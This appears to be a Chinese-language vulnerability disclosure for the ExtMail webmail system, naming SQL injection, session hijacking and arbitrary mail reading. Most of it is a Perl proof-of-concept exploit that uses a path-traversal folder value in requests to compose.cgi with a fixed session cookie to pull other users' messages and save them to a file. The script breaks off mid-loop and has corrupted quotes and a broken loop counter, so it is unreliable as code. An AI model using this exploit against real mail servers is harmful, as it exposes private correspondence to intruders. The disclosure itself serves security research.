漏洞说明：ExtMail Project 是一个活跃的开源邮件系统项目，目前由ExtMail 团队维护。该项于2005年9月18日正式启动，最初以WebMail软件为主，至今已逐步形成了ExtMail软件系列。整个项目的目标是开发出高效、 易用、富有生命力的邮件系统(方案)，经过粗略的统计，截止2007年6月份，已有超过3000个服务器在运行ExtMail软件，其中有超过1000个 运行在互联网上。Webmail采取perl语言CGI方式编写，国内众多知名站点均使用extmail，譬如 http://mail.csdn.net。80sec在其产品中发现安全漏洞，包括SQL注射，任意用户身份劫持，以及任意信件读取的几个重大安全漏 洞。
漏洞厂商：http://
use LWP;
my $browser = LWP::UserAgent->new;
$mysid="d9a4c4f05aca535d696f8983a23e42bd";
$mytarget="http:///";
$user='80sec';
$ARGV[0]&&($user=$ARGV[0]);
open(RESULT,”>>$user.txt”);
for($i=0;;$i ) {
my @headers=(’Cookie’=>”sid=$mysid”,’User-Agent’=>’Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’,);
$myresponse=$browser->post(”${mytarget}compose.cgi”,['__mode'=>'edit_forward','folder'=>"Sent/../../../${user}/Maildir",'pos'=>"$i"],@headers);
$myecho=$myresponse->content;